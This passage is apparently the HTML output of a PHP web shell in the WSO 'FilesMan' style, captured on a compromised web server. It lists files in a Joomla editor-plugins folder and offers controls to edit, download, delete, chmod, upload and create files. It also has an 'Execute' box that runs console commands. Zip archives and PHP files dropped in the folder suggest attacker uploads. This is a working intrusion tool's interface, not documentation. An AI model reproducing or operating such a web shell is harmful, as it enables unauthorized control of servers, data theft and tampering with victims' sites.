23:21:27</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'nab','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'nab', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'nab', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="tinymce" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/tinymce');" title=><b>[ tinymce ]</b></a></td><td>dir</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="xstandard" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/xstandard');" title=><b>[ xstandard ]</b></a></td><td>dir</td><td>2019-06-09 07:42:20</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="adminsigning.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'adminsigning.zip', 'view')">adminsigning.zip</a></td><td>370.55 KB</td><td>2018-04-19 08:57:45</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'adminsigning.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="home.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'home.php', 'view')">home.php</a></td><td>285 B</td><td>2019-01-05 03:01:48</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'home.php','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'home.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="index.html" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'index.html', 'view')">index.html</a></td><td>44 B</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'index.html','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'index.html', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jce.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jce.php', 'view')">jce.php</a></td><td>25.47 KB</td><td>2018-01-09 18:19:01</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'jce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jce.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jce.xml', 'view')">jce.xml</a></td><td>29.97 KB</td><td>2014-03-25 13:50:01</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'jce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jck.js.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jck.js.php', 'view')">jck.js.php</a></td><td>5.28 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck.js.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck.js.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jck.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jck.php', 'view')">jck.php</a></td><td>21.79 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jckstyles.xml.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jckstyles.xml.php', 'view')">jckstyles.xml.php</a></td><td>3.72 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jckstyles.xml.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jcktemplates.xml.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jcktemplates.xml.php', 'view')">jcktemplates.xml.php</a></td><td>2.62 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jcktemplates.xml.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="midd.png" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'midd.png', 'view')">midd.png</a></td><td>796.23 KB</td><td>2018-03-27 02:54:12</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'midd.png','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'midd.png', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="none.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'none.php', 'view')">none.php</a></td><td>53.63 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'none.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'none.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="none.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'none.xml', 'view')">none.xml</a></td><td>573 B</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'none.xml','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'none.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="office.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'office.zip', 'view')">office.zip</a></td><td>1.38 MB</td><td>2018-11-19 13:48:12</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'office.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'office.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="tinymce.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'tinymce.php', 'view')">tinymce.php</a></td><td>20.95 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="tinymce.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'tinymce.xml', 'view')">tinymce.xml</a></td><td>10.19 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="TSB.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'TSB.zip', 'view')">TSB.zip</a></td><td>871.25 KB</td><td>2021-01-18 10:31:40</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'TSB.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'TSB.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="wellss.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'wellss.zip', 'view')">wellss.zip</a></td><td>1.13 MB</td><td>2021-01-20 15:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'wellss.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'wellss.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="xstandard.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'xstandard.php', 'view')">xstandard.php</a></td><td>148.11 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="xstandard.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'xstandard.xml', 'view')">xstandard.xml</a></td><td>1.10 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'download')">D</a></td></tr><tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'>
	<input type=hidden name=charset value='Windows-1251'>
	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option><option value='tar'>Compress (tar.gz)</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'><input type=submit value='>>'></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='Windows-1251'>
		<span>Upload file:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
	</tr></table></div></body></html>